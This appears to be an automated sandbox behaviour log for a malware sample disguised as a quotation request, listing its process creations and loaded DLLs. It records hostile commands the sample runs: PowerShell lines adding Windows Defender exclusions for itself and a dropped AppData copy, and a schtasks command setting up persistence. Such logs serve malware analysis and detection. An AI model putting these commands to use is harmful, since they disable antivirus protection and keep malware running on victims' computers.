Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe ReversingLabs: Detection: 34%
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe File read: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe "C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe"
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\jnqeRRexnD.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jnqeRRexnD" /XML "C:\Users\user\AppData\Local\Temp\tmp2F66.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Process created: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe "C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: unknown Process created: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe C:\Users\user\AppData\Roaming\jnqeRRexnD.exe
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jnqeRRexnD" /XML "C:\Users\user\AppData\Local\Temp\tmp42C0.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Process created: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe "C:\Users\user\AppData\Roaming\jnqeRRexnD.exe"
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe" Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\jnqeRRexnD.exe" Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jnqeRRexnD" /XML "C:\Users\user\AppData\Local\Temp\tmp2F66.tmp" Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Process created: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe "C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe" Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jnqeRRexnD" /XML "C:\Users\user\AppData\Local\Temp\tmp42C0.tmp" Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Process created: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe "C:\Users\user\AppData\Roaming\jnqeRRexnD.exe" Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Section loaded: dwrite.dll Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: fastprox.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: ncobjapi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: mpclient.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wmitomi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: mi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: miutils.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: miutils.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Section loaded: dwrite.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Section loaded: rasman.dll
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Section loaded: mswsock.dll
